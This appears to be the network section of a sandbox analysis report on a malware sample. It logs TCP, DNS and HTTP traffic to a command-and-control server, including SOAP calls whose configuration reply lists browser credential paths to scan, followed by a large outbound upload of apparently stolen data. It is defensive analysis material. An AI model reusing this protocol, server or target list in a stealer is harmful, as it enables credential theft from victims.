Jul 27, 2024 06:57:11.360191107 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360194921 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360233068 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360244989 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360304117 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360316992 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360338926 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360349894 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360361099 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360429049 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360440016 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360451937 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360462904 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360496998 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360511065 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360522985 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360533953 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360546112 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360568047 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360579014 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360590935 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360601902 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360614061 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360646009 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360657930 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360668898 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360681057 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360692024 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360783100 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360794067 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360805988 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360817909 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360829115 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360841036 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360852957 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360865116 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360877037 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360888958 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360910892 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360924006 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360935926 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360946894 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360959053 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360970020 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360981941 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.360994101 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361016989 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361028910 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361040115 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361052036 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361066103 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361077070 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361088037 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361099958 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361112118 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361124039 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361138105 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361150026 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361160994 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361172915 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361183882 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361196041 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361207962 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361218929 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361229897 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361242056 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361336946 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361349106 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361360073 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361371994 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361382961 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361394882 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361416101 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361427069 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361438990 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361450911 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361454964 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361469030 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361480951 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361491919 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361505032 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361516953 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361527920 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361538887 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361551046 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361562014 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361583948 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361594915 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361607075 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361618042 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361629963 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361654043 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361665964 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361677885 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361690998 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361712933 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361725092 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361736059 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361747026 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361761093 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361785889 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361798048 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361809969 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361820936 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361831903 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361855030 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361865997 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361877918 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361890078 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361901045 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361912966 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361924887 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361937046 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361951113 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361963034 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361974001 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361984968 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.361996889 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362008095 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362019062 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362030983 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362041950 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362065077 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362076998 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362088919 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362099886 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362112045 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362123966 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362134933 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362147093 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362158060 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362169981 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362193108 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362204075 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362217903 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362229109 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362241983 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362252951 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362265110 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362276077 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362287045 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362298965 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362309933 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362322092 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362344027 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362354994 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362366915 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362379074 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362390041 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362401962 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362412930 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362425089 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362438917 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362449884 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362462044 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362474918 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362487078 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362498045 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362509966 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362520933 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362533092 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362544060 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362566948 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362577915 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362590075 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362601995 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362612963 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362624884 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362636089 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362648010 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362659931 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362670898 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362683058 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362694025 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362708092 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362720013 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362730980 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362742901 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362755060 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362766027 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362776995 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362787962 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362799883 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362812042 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362834930 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362845898 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362858057 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362869978 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362881899 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362893105 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362904072 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362915993 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362934113 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362946033 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362957001 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362968922 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362981081 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.362992048 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363003969 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363027096 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363039017 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363049984 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363061905 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363073111 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363095045 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363106012 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363116980 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363128901 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363142967 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363154888 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363166094 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363190889 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363202095 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363214016 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363225937 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363236904 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363248110 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363260031 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363281965 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363293886 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363317013 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363327980 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363339901 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363351107 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363363028 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363373995 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363385916 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363396883 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363410950 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363423109 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363434076 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363445997 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363457918 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:11.363468885 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:12.421302080 CEST	55615	49707	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:12.440176010 CEST	49707	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:12.441162109 CEST	49706	55615	192.168.2.5	185.222.58.236

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 06:57:06.571244001 CEST	61532	53	192.168.2.5	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 06:57:06.571244001 CEST	192.168.2.5	1.1.1.1	0x4a16	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 06:57:06.578025103 CEST	1.1.1.1	192.168.2.5	0x4a16	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.222.58.236:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.222.58.236	55615	6720	C:\Users\user\Desktop\UzQWEAhf9B.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:57:00.608025074 CEST	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.236:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jul 27, 2024 06:57:01.196583033 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 27 Jul 2024 04:57:00 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jul 27, 2024 06:57:06.258881092 CEST	224	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.236:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jul 27, 2024 06:57:06.431098938 CEST	25	IN	HTTP/1.1 100 Continue
Jul 27, 2024 06:57:06.534907103 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 27 Jul 2024 04:57:05 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	185.222.58.236	55615	6720	C:\Users\user\Desktop\UzQWEAhf9B.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:57:09.263360023 CEST	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.236:55615 Content-Length: 982550 Expect: 100-continue Accept-Encoding: gzip, deflate
Jul 27, 2024 06:57:10.863353014 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 27 Jul 2024 04:57:10 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	185.222.58.236	55615	6720	C:\Users\user\Desktop\UzQWEAhf9B.exe

Timestamp	Bytes transferred	Direction	Data
